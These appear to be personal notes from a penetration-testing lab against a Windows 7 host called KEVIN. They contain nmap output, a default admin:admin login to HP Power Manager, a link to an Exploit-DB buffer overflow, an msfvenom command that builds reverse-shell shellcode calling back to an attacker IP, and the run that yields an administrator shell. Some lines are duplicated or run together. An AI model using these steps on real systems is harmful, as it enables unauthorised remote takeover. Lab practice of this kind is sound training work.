PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 125 GoAhead WebServer
|_http-server-header: GoAhead-Webs
| http-title: HP Power Manager
|_Requested resource was http://192.168.218.45/index.asp
| http-methods:
|_ Supported Methods: GET HEAD
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack ttl 125 Windows 7 Ultimate N 7600 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open tcpwrapped syn-ack ttl 125
| rdp-ntlm-info:
| Target_Name: KEVIN
| NetBIOS_Domain_Name: KEVIN
| NetBIOS_Computer_Name: KEVIN
| DNS_Domain_Name: kevin
| DNS_Computer_Name: kevin
| Product_Version: 6.1.7600
|_ System_Time: 2024-07-19T14:03:29+00:00
49152/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49153/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49154/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49155/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49158/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49159/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
Replace the text in the SHELL variable after "n00bn00b" with our own shell code
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.180 LPORT=80 -f c -b "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24\x25\x1a" -e x86/alpha_mixed
Access 80/tcp web page: admin:admin login --> succeed. /help page ---> HP Power Manager 4.2 ---> https://www.exploit-db.com/exploits/10099 (Buffer Overflow)
Replace the text in the SHELL variable after "n00bn00b" with our own shell code
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.180 LPORT=80 -f c -b "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24\x25\x1a" -e x86/alpha_mixedRun: python2.7 10099.py 192.168.218.45 -->
Got reverse shell as NT administrator user !